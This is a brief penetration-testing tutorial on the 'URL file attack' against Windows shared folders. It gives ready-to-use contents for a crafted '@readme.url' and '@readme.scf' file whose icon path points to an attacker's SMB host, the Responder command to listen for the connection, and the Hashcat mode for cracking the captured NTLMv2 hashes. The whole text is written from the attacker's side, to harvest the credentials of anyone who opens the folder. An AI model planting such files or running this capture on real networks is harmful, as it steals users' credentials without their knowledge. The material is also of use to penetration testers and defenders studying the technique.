What is a URL File Attack?
A URL file attack captures account hashes via a user accessing a folder that contains a specially crafted file that forces the user to request an icon off the attackers machine. The resource does not exist though. The act of initiating a connection to the attackers machine is how the hash is captured. Also note that the user does not need to open the file, nor is their any indication that anything has happened behind the scenes. They just need to open the folder that the file is located in which makes this a perfect for shared folders.
The file name must begin with either a “@” symbol or a “~” symbol and the filetype must be “url”. Example: “@readme.url”
[InternetShortcut] URL=http://google.com WorkingDirectory=%username% IconFile=\\192.168.1.240\%USERNAME%.icon IconIndex=1
The same can be done with an scf file. Example: @readme.scf
[Shell] Command=2 IconFile=\\192.168.1.240\Share\test.ico [Taskbar] Command=ToggleDesktop
Make sure HTTP and SMB is turned ON in responder. (default responder settings)
responder -I eth0 -rdwv
Capture the Hash
Whatever user opens the folder is the hash we will capture in responder. Note the NTLMv2 hash 🙂 Hashcat mode: 5600